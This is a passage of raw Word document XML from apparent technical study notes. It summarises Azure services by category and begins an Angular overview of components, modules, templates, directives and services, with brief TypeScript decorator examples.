          <v:rect id="_x0000_i3471" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29919109" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>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5. DevOps &amp; CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075C44F"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DevOps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Tools for CI/CD, agile planning, repo management, testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F8F3D3"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GitHub Actions for Azure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Build, test, and deploy code using GitHub directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEB96B" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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7ECC2E">
          <v:rect id="_x0000_i3472" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C40EC" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>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6. Security &amp; Identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54236BBC"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Active Directory (AAD):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Identity and access management for apps, users, services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE8E881"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Key Vault:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Securely store secrets, keys, and certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C9B92"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lastRenderedPageBreak/>
        <w:t>Microsoft Defender for Cloud:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Threat protection and security posture management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1958E983" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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16BFC91">
          <v:rect id="_x0000_i3473" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03030648" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>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7. Monitoring &amp; Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614BAC5"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Monitor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Collect, analyze, and act on telemetry data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044DDD68"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Log Analytics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Query and analyze logs from across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A338DFD"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Application Insights:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Performance monitoring for live web apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DAE705" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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6C52A42">
          <v:rect id="_x0000_i3474" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD88EC" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>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8. AI, ML &amp; Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDACB55"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Cognitive Services:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Pre-trained AI APIs (vision, speech, language).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B750A0"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Machine Learning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>End-to-end ML lifecycle management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CCE50"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Synapse Analytics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Powerful analytics with SQL + Spark integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA391C7" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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4F2E8D0">
          <v:rect id="_x0000_i3475" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C5A69" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>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9. Containers &amp; Serverless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC51CD2"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Container Instances (ACI):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Run containers without managing servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EFAAB6"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Container Registry (ACR):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Private Docker container registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574DCDC"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Functions / Logic Apps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Event-driven and low-code workflows respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F49CE79" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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5DA4E4E">
          <v:rect id="_x0000_i3476" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82B6D2" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10. IoT &amp; Event-Driven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC7F57"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IoT Hub:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Manage IoT devices and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DF98E" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Azure Event Grid / Service Bus / Event Hubs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Event routing and messaging between services or systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE04634" w14:textId="3470C728" w:rsidR="009245ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009245ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="07F74723">
          <v:rect id="_x0000_i3477" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6908D2FF" w14:textId="77777777" w:rsidR="00E8719B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E8719B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1293657E" w14:textId="19914484" w:rsidR="00E8719B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E8719B" w:rsidP="00E8719B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="857" w:name="_Toc196308337"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Angular</w:t>
      </w:r>
      <w:bookmarkEnd w:id="857"/>
    </w:p>
    <w:p w14:paraId="2028D18F" w14:textId="75FE6615" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF250E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="858" w:name="_Toc196308338"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the components in the Angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="858"/>
    </w:p>
    <w:p w14:paraId="0645E2A7" w14:textId="491A22AB" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In Angular, the core building blocks of an application are </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>components</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here are the main </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>components and essential parts of the Angular architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214D8B7" w14:textId="77777777" w:rsidR="003B3B1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2D9D5F2">
          <v:rect id="_x0000_i3478" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CAB93A" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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1. Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6030AA41"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> controls a part of the screen (UI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460064B1"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t consists of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823B56B" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E"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TypeScript class</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – contains logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF3788E" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E"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HTML template</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – defines the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13649949" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E"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CSS styles</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – styling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155933C1"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mponent({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23295D"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selector: 'app-user',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F69BBE"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emplateUrl: './user.component.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC1A262"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styleUrls: ['./user.component.css']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F8C0E"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572CB1B4"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UserComponent { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AA1E34" w14:textId="77777777" w:rsidR="003B3B1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9F15491">
          <v:rect id="_x0000_i3479" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155AC98" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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2. Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB3F27"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Module</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NgModule) groups components, directives, pipes, and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46427F47"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root module</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is AppModule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019A4E8"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NgModule({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D81126"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declarations: [AppComponent],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6616D9D6"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imports: [BrowserModule],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AFD81D"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bootstrap: [AppComponent]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16027D32"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7889A487"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AppModule { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379C62E" w14:textId="77777777" w:rsidR="003B3B1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A462C98">
          <v:rect id="_x0000_i3480" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B4A55C" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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3. Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A387B50"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Defines the HTML view of the component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DF6B15"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an include Angular syntax: *ngIf, *ngFor, {{ }} (interpolation), event binding, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1BC5E2" w14:textId="77777777" w:rsidR="003B3B1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129AEF8">
          <v:rect id="_x0000_i3481" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8341B6" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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4. Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7CB3B4"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Decorators like @Component, @NgModule, etc., provide </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to tell Angular how to process classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06D49D" w14:textId="77777777" w:rsidR="003B3B1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72A1B37">
          <v:rect id="_x0000_i3482" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="571744CE" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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5. Directive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B76E66"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A class that modifies the DOM or behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4213178C" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E"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Structural</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., *ngIf, *ngFor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B1D30" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E"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Attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., [ngClass], [ngStyle])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BB7A5" w14:textId="77777777" w:rsidR="003B3B1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562CC85">
          <v:rect id="_x0000_i3483" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160FC80" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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6. Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C37FE2"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tains reusable business logic or data access.</w:t>
      </w:r>
    </w:p>
